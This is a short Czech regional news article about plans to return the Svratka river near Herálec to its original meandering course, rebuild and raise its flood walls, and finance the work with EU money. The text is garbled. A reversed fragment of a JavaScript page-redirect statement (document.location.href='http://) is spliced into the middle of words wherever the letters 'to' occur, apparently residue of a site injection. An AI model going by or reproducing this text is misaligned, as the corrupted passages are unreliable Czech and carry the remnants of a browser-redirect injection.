Rainbow page separator

Svratka se vrátí zpět do původního meandrujícího koryta

Úterý, 26. července 2022

Herálec / Úpravy koryta ještě v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce čekají řeku Svratku v zastavěné části Herálce i jeho okolí. Pod vesnicí má říční [„\’///:ptth\’=ferh.noitacol.tnemucod“];tok, jenž byl kdysi uměle napřímený, opět meandrovat podmáčenými loukami v Chráněné krajinné oblasti Žďárské vrchy. V souvislosti s tím dojde k rozebrání a opě[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovnému vybudování a také zvýšení kamenných zídek kolem říčního koryta v obci, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];to tak, aby lépe chránily okolí při povodňových prů[„\’///:ptth\’=ferh.noitacol.tnemucod“];tocích. Zvýšeny budou i lávky. Ochranné zídky vznikly před šesti až sedmi desetiletími a již dosluhují.
Povodí Moravy coby správce [„\’///:ptth\’=ferh.noitacol.tnemucod“];toku na stavební práce s předpokládanou cenou kolem sedmašedesáti milionů korun získá finanční podporu z evropského operačního programu Životní prostředí. Záměrem je zadržení vody v krajině a snížení povodňových prů[„\’///:ptth\’=ferh.noitacol.tnemucod“];toků, kdy se v říční nivě bude moci voda rozlévat po loukách. Práce mají být ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovy do konce příštího roku.